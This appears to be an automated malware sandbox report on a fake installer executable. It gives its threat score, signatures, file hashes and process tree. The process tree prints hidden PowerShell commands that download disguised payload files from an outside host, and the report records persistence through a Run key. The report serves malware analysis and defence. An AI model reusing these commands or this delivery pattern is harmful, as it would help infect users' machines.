Overview

overview

10

Static

static

1

Installer_...se.exe

windows7-x64

8

Installer_...se.exe

windows10-2004-x64

10

app-11.17....se.exe

windows10-2004-x64

10

app-11.17....lf.log

windows7-x64

1

app-11.17....lf.log

windows10-2004-x64

1

app-11.17....nt.pak

windows7-x64

3

app-11.17....nt.pak

windows10-2004-x64

3

app-11.17....nt.pak

windows7-x64

3

app-11.17....nt.pak

windows10-2004-x64

3

app-11.17....47.dll

windows10-2004-x64

1

app-11.17....eg.dll

windows7-x64

1

app-11.17....eg.dll

windows10-2004-x64

1

app-11.17....tl.dat

windows7-x64

3

app-11.17....tl.dat

windows10-2004-x64

3

app-11.17....GL.dll

windows7-x64

1

app-11.17....GL.dll

windows10-2004-x64

1

app-11.17....v2.dll

windows7-x64

1

app-11.17....v2.dll

windows10-2004-x64

1

app-11.17....GB.pak

windows7-x64

3

app-11.17....GB.pak

windows10-2004-x64

3

app-11.17....US.pak

windows7-x64

3

app-11.17....US.pak

windows10-2004-x64

3

app-11.17....uk.pak

windows7-x64

3

app-11.17....uk.pak

windows10-2004-x64

3

app-11.17....vi.pak

windows7-x64

3

app-11.17....vi.pak

windows10-2004-x64

3

app-11.17....CN.pak

windows7-x64

3

app-11.17....CN.pak

windows10-2004-x64

3

app-11.17....TW.pak

windows7-x64

3

app-11.17....TW.pak

windows10-2004-x64

3

app-11.17....es.pak

windows7-x64

3

app-11.17....es.pak

windows10-2004-x64

3

Analysis

  • max time kernel
    121s
  • max time network
    137s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    04-11-2024 13:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Installer_x64_Final_Release.exe

  • Size

    349KB

  • MD5

    c7e6efa0d590d5549cbcc04c002e7d52

  • SHA1

    928ae92ad78feb1a6619002a426fd29259ebbb10

  • SHA256

    4fedd10d64e0b83fe1c8a6cc64116143340606ac1b4222fb3c2cd1ec69aa75f3

  • SHA512

    ad2e2101370ba3878ebf35f598119e16325a8929685e59ddf9b920fb9ac77e7dfc1abbe323673a9d494f6eb3ed37867e615af4305ceee151d4a932cbe971b16b

  • SSDEEP

    3072:sn/GaFJJZ+Qima9IjVe9+L+xZ2N4OCSPQwZkXkAy5vHSQhQWXUjzBW2HwbvWUFIY:IBmm+aVecLuK0uPZQkkQq9Wew7a6n

Score
8/10
executionpersistence

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

    execution
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Installer_x64_Final_Release.exe
    "C:\Users\Admin\AppData\Local\Temp\Installer_x64_Final_Release.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1764
    • C:\Users\Admin\AppData\Local\Temp\app-11.17.0\Installer_x64_Final_Release.exe
      "C:\Users\Admin\AppData\Local\Temp\app-11.17.0\Installer_x64_Final_Release.exe"
      2⤵
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:1732
      • C:\Windows\system32\cmd.exe
        cmd /c sora.bat
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2128
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://cyberniton.com/Storage/Martin.jpg' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Martin.zip'"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2840
      • C:\Windows\system32\cmd.exe
        cmd /c sorast.bat
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2796
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://cyberniton.com/Storage/Martinst.jpg' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Martinst.zip'"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2856

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sora.bat
    Filesize

    7KB

    MD5

    584db35e5bedc244c7fa8e96d72c4b4b

    SHA1

    e76629464cef09ce5ef474ff06731a5826b07cd6

    SHA256

    b65d65a027f3d6aad56c1d864347e2110fb4d42ebaf97b96ac6a689ba47891c3

    SHA512

    2eaa219af41107a2658823a9e5de5d1d19aa447f9eb3c1432bd12cec21647908bbe803d706097090ed192abea8b722bc548682877709623584ded5ccb4891075

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sorast.bat
    Filesize

    7KB

    MD5

    0e3af1059504f34398373a7e5995cf5e

    SHA1

    748bb1a44b1c0754c0ee930ddcda67a1d4025d8d

    SHA256

    294cd777aed1e5bc55b7c2f29f6e38d1998f90da379904e1fdb9138c60a14144

    SHA512

    23cd71d9c8c0c8da56645b7e93215410224f3ea9c6fcecca5c8038a30813d65790ab4c44e22e55c0deac01c3c2c34d00a257d06688328d3167d3bfb0cc2d1c02

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    5b3a0ea404811a2db1bde63cb30f15b6

    SHA1

    426ea3d2f9c23dfee911d7329ff3151ecfa8f8bd

    SHA256

    98968303f9204cd90d7e7e929c3249c0d7f4431efc2ddd28c84450239858a18e

    SHA512

    0c236b74a13bf3d6a792764f72adaa76bcf0c97855ddef0de28073051a2011315d6e145d6603f2627e5e8b4ee0bc7015de6fb6dc0371e7fef98b44b0f6d4b40e

    Download Submit

  • memory/2840-14-0x000007FEF5630000-0x000007FEF5FCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2840-12-0x000007FEF5630000-0x000007FEF5FCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2840-13-0x000007FEF5630000-0x000007FEF5FCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2840-11-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2840-15-0x000007FEF5630000-0x000007FEF5FCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2840-16-0x000007FEF5630000-0x000007FEF5FCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2840-17-0x000007FEF5630000-0x000007FEF5FCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2840-10-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2840-9-0x000007FEF58EE000-0x000007FEF58EF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2856-24-0x000000001B700000-0x000000001B9E2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2856-25-0x0000000001D20000-0x0000000001D28000-memory.dmp

    Filesize

    32KB

    Download